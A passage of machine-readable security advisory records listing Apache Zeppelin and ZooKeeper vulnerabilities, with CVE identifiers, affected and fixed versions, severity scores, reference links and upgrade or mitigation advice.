"https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r99529e175a7c1c9a26bd41a02802c8af7aa97319fe561874627eb999%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r99529e175a7c1c9a26bd41a02802c8af7aa97319fe561874627eb999@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-04" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/09/02/2" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-09-03T20:16:12Z", "nvd_published_at": "2021-09-02T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9p8j-hrgf-jc2g", "published": "2022-12-20T21:30:19Z", "modified": "2023-11-08T04:10:58.147637Z", "aliases": [ "CVE-2022-46870" ], "summary": "Apache Zeppelin Cross-site Scripting vulnerability", "details": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Zeppelin allows logged-in users to execute arbitrary javascript in other users' browsers. This issue affects Apache Zeppelin before 0.8.2. Users are recommended to upgrade to a supported version of Zeppelin.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.8.2" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-9p8j-hrgf-jc2g/GHSA-9p8j-hrgf-jc2g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46870" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/gb1wdnrm1095xw6qznpsycfrht4lwbwc" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2022-12-20T22:10:26Z", "nvd_published_at": "2022-12-16T13:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9x2h-hvg6-4r5p", "published": "2019-04-24T16:06:52Z", "modified": "2023-11-08T03:59:52.831613Z", "aliases": [ "CVE-2018-1317" ], "summary": "Improper Authentication in Apache Zeppelin", "details": "In Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-9x2h-hvg6-4r5p/GHSA-9x2h-hvg6-4r5p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1317" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff6b995a5a3ba8db4d6b14b4d9dd487e7bf2e3bdd5b375b64a25fd06@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://zeppelin.apache.org/releases/zeppelin-release-0.8.0.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/04/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2019-04-24T16:07:02Z", "nvd_published_at": "2019-04-23T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c538-924g-99q4", "published": "2019-04-24T16:06:59Z", "modified": "2023-11-08T03:58:53.247281Z", "aliases": [ "CVE-2017-12619" ], "summary": "Session Fixation in Apache Zeppelin", "details": "Apache Zeppelin prior to 0.7.3 was vulnerable to session fixation which allowed an attacker to hijack a valid user session. Issue was reported by \"stone lone\".", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.7.3" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-c538-924g-99q4/GHSA-c538-924g-99q4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12619" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff6b995a5a3ba8db4d6b14b4d9dd487e7bf2e3bdd5b375b64a25fd06@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://zeppelin.apache.org/releases/zeppelin-release-0.7.3.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/04/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-384" ], "github_reviewed": true, "github_reviewed_at": "2019-04-24T16:04:01Z", "nvd_published_at": "2019-04-23T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gm67-h5wr-w3cv", "published": "2023-07-06T19:24:05Z", "modified": "2024-02-16T08:14:41.034081Z", "aliases": [ "CVE-2021-28655" ], "summary": "Apache Zeppelin Improper Input Validation vulnerability", "details": "The improper Input Validation vulnerability in `Move folder to Trash` feature of Apache Zeppelin allows an attacker to delete the arbitrary files. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-gm67-h5wr-w3cv/GHSA-gm67-h5wr-w3cv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28655" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bxs056g3xlsofz0jb3wny9dw4llwptd2" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T21:44:43Z", "nvd_published_at": "2022-12-16T13:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mf7q-gw5f-q8jj", "published": "2021-09-07T22:55:56Z", "modified": "2024-02-16T08:08:39.299528Z", "aliases": [ "CVE-2021-27578" ], "summary": "Cross-site Scripting in Apache Zeppelin", "details": "Cross Site Scripting vulnerability in markdown interpreter of Apache Zeppelin allows an attacker to inject malicious scripts. This issue affects Apache Zeppelin Apache Zeppelin versions prior to 0.9.0.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.9.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-mf7q-gw5f-q8jj/GHSA-mf7q-gw5f-q8jj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27578" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31012f2c8e39a5e12e14c1de030012cb8b51c037d953d73b291b7b50%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31012f2c8e39a5e12e14c1de030012cb8b51c037d953d73b291b7b50@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-04" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/09/02/3" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2021-09-03T20:16:10Z", "nvd_published_at": "2021-09-02T17:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r2v5-5vcr-h3vq", "published": "2019-04-24T16:07:36Z", "modified": "2023-11-08T03:59:53.255873Z", "aliases": [ "CVE-2018-1328" ], "summary": "Cross-site Scripting in Apache Zeppelin", "details": "Apache Zeppelin prior to 0.8.0 had a stored XSS issue via Note permissions. Issue reported by \"Josna Joseph\".", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r2v5-5vcr-h3vq/GHSA-r2v5-5vcr-h3vq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1328" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff6b995a5a3ba8db4d6b14b4d9dd487e7bf2e3bdd5b375b64a25fd06@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://zeppelin.apache.org/releases/zeppelin-release-0.8.0.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/04/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-04-24T16:03:49Z", "nvd_published_at": "2019-04-23T15:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7pgf-ppxw-8624", "published": "2025-07-12T18:30:31Z", "modified": "2025-11-05T20:33:56.241584Z", "aliases": [ "CVE-2024-41169" ], "summary": "Apache Zeppelin exposes server resources to unauthenticated attackers", "details": "The attacker can use the raft server protocol in an unauthenticated way. The attacker can see the server's resources, including directories and files.\n\nThis issue affects Apache Zeppelin: from 0.10.1 up to 0.12.0.\n\nUsers are recommended to upgrade to version 0.12.0, which fixes the issue by removing the Cluster Interpreter.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin-interpreter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-interpreter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.10.1" }, { "fixed": "0.12.0" } ] } ], "versions": [ "0.10.1", "0.11.0", "0.11.1", "0.11.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-7pgf-ppxw-8624/GHSA-7pgf-ppxw-8624.json" } }, { "package": { "name": "org.apache.zeppelin:zeppelin-server", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.10.1" }, { "fixed": "0.12.0" } ] } ], "versions": [ "0.10.1", "0.11.0", "0.11.1", "0.11.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-7pgf-ppxw-8624/GHSA-7pgf-ppxw-8624.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41169" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/pull/4841" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/ZEPPELIN-6101" }, { "type": "WEB", "url": "https://lists.apache.org/thread/moyym04993c8owh4h0qj98r43tbo8qdd" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/13/1" } ], "database_specific": { "cwe_ids": [ "CWE-664" ], "github_reviewed": true, "github_reviewed_at": "2025-07-14T20:31:20Z", "nvd_published_at": "2025-07-12T17:15:20Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-86jx-wr74-xr74", "published": "2024-04-09T18:30:22Z", "modified": "2024-08-21T19:06:54.380122Z", "aliases": [ "CVE-2024-31866" ], "summary": "Improper escaping in Apache Zeppelin", "details": "Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.\n\nThe attackers can execute shell scripts or malicious code by overriding configuration like ZEPPELIN_INTP_CLASSPATH_OVERRIDES.\nThis issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin-interpreter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-interpreter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.8.2" }, { "fixed": "0.11.1" } ] } ], "versions": [ "0.10.0", "0.10.1", "0.11.0", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-86jx-wr74-xr74/GHSA-86jx-wr74-xr74.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31866" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/pull/4715" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/commit/dd08a3966ef3b0b40f13d0291d7cac5ec3dd9f9c" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/jpkbq3oktopt34x2n5wnhzc2r1410ddd" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/04/09/10" } ], "database_specific": { "cwe_ids": [ "CWE-116" ], "github_reviewed": true, "github_reviewed_at": "2024-05-24T20:11:32Z", "nvd_published_at": "2024-04-09T16:15:08Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rrvf-5w4r-3x7v", "published": "2024-04-09T18:30:22Z", "modified": "2024-10-03T18:26:19.190568Z", "aliases": [ "CVE-2024-31868" ], "summary": "Apache Zeppelin vulnerable to cross-site scripting in the helium module", "details": "Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.\n\nAttackers can modify `helium.json` and perform cross-site scripting attacks on normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin-interpreter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-interpreter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.8.2" }, { "fixed": "0.11.1" } ] } ], "versions": [ "0.10.0", "0.10.1", "0.11.0", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-rrvf-5w4r-3x7v/GHSA-rrvf-5w4r-3x7v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31868" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/pull/4728" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/commit/83685795e0ec8d3059fd7a3dbcae5c0532b63b79" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/55mqs673plsxmgnq7fdf2flftpllyf11" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/04/09/11" } ], "database_specific": { "cwe_ids": [ "CWE-116", "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-04-11T20:13:12Z", "nvd_published_at": "2024-04-09T16:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2hmj-97jw-28jh", "published": "2025-09-24T12:30:20Z", "modified": "2025-11-05T20:52:30.268611Z", "aliases": [ "BIT-zookeeper-2025-58457", "CVE-2025-58457" ], "related": [ "CGA-g4wh-hpww-wvx9", "CGA-jcj7-w8c7-27p8", "CGA-m88p-r4m6-cfxc" ], "summary": "Apache ZooKeeper: Insufficient Permission Check in AdminServer Snapshot/Restore Commands", "details": "Improper permission checks in the AdminServer allow an authenticated client with insufficient privileges to invoke the `snapshot` and `restore` commands. The intended requirement is authentication and authorization on the root path (`/`) with **ALL** permission for these operations; however, affected versions permit invocation without that level of authorization. The primary risk is disclosure of cluster state via snapshots to a lesser-privileged client.\n\n* **Affected:** `org.apache.zookeeper:zookeeper` 3.9.0 through 3.9.3.\n* **Fixed:** 3.9.4 (ZOOKEEPER-4964 “check permissions individually during admin server auth”).\n* **Mitigations:**\n * Disable both commands (`admin.snapshot.enabled`, `admin.restore.enabled`).\n * Disable AdminServer (`admin.enableServer`).\n * Ensure the root ACL is not open; note that ZooKeeper ACLs are not recursive.\n * Upgrade to 3.9.4.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.4" } ] } ], "versions": [ "3.9.0", "3.9.1", "3.9.2", "3.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-2hmj-97jw-28jh/GHSA-2hmj-97jw-28jh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58457" }, { "type": "PACKAGE", "url": "https://github.com/apache/zookeeper" }, { "type": "WEB", "url": "https://lists.apache.org/thread/r5yol0kkhx2fzw22pxk1ozwm3oc6yxrx" }, { "type": "WEB", "url": "https://zookeeper.apache.org/doc/current/zookeeperSnapshotAndRestore.html" }, { "type": "WEB", "url": "https://zookeeper.apache.org/doc/r3.9.4/releasenotes.html" }, { "type": "WEB", "url": "https://zookeeper.apache.org/security.html#CVE-2025-58457" }, { "type": "WEB", "url": "http://github.com/apache/zookeeper/commit/71e173fcbcc9deb784081cf867bd045df3c32635" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/09/24/10" } ], "database_specific": { "cwe_ids": [ "CWE-280" ], "github_reviewed": true, "github_reviewed_at": "2025-09-24T19:00:08Z", "nvd_published_at": "2025-09-24T10:15:28Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2hw2-62cp-p9p7", "published": "2019-05-29T18:54:11Z", "modified": "2024-03-14T05:19:59.559879Z", "aliases": [ "CVE-2019-0201" ], "summary": "Access control bypass in Apache ZooKeeper", "details": "An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper?s getACL() command doesn?t check any permission when retrieves the ACLs of the requested node and returns all information contained in the ACL Id field as plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "3.4.14" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6", "3.4.0", "3.4.1", "3.4.10", "3.4.11", "3.4.12", "3.4.13", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-2hw2-62cp-p9p7/GHSA-2hw2-62cp-p9p7.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.5.0" }, { "fixed": "3.5.5" } ] } ], "versions": [ "3.5.1-alpha", "3.5.2-alpha", "3.5.3-beta", "3.5.4-beta" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-2hw2-62cp-p9p7/GHSA-2hw2-62cp-p9p7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0201" }, { "type": "WEB", "url": "https://zookeeper.apache.org/security.html#CVE-2019-0201" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4461" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190619-0001" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Jun/13" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00033.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r40f32125c1d97ad82404cc918171d9e0fcf78e534256674e9da1eb4b@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f6112882e30a31992a79e0a8c31ac179e9d0de7c708de3a9258d4391@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5d9a1cf41a5880557bf680b7321b4ab9a4d206c601ffb15fef6f196a@%3Ccommits.accumulo.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/ZOOKEEPER-1392" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4352" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/108427" } ], "database_specific": { "cwe_ids": [ "CWE-862" ], "github_reviewed": true, "github_reviewed_at": "2019-05-29T18:53:55Z", "nvd_published_at": "2019-05-23T14:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7286-pgfv-vxvh", "published": "2023-10-11T12:30:27Z", "modified": "2025-02-13T19:37:41.243540Z", "aliases": [ "BIT-zookeeper-2023-44981", "CVE-2023-44981" ], "related": [ "CGA-r4gp-jw3v-m8j8" ], "summary": "Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper", "details": "Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in SASL authentication ID is listed in zoo.cfg server list. The instance part in SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. Quorum Peer authentication is not enabled by default.\n\nUsers are recommended to upgrade to version 3.9.1, 3.8.3, 3.7.2, which fixes the issue.\n\nAlternately ensure the ensemble election/quorum communication is protected by a firewall as this will mitigate the issue.\n\nSee the documentation for more details on correct cluster administration.", "affected": [ { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.7.2" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6", "3.4.0", "3.4.1", "3.4.10", "3.4.11", "3.4.12", "3.4.13", "3.4.14", "3.4.2", "3.4.3", "3.4.4", "3.4.5", "3.4.6", "3.4.7", "3.4.8", "3.4.9", "3.5.0-alpha", "3.5.1-alpha", "3.5.10", "3.5.2-alpha", "3.5.3-beta", "3.5.4-beta", "3.5.5", "3.5.6", "3.5.7", "3.5.8", "3.5.9", "3.6.0", "3.6.1", "3.6.2", "3.6.3", "3.6.4", "3.7.0", "3.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-7286-pgfv-vxvh/GHSA-7286-pgfv-vxvh.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.8.0" }, { "fixed": "3.8.3" } ] } ], "versions": [ "3.8.0", "3.8.1", "3.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-7286-pgfv-vxvh/GHSA-7286-pgfv-vxvh.json" } }, { "package": { "name": "org.apache.zookeeper:zookeeper", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zookeeper/zookeeper" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0" }, { "fixed": "3.9.1" } ] } ], 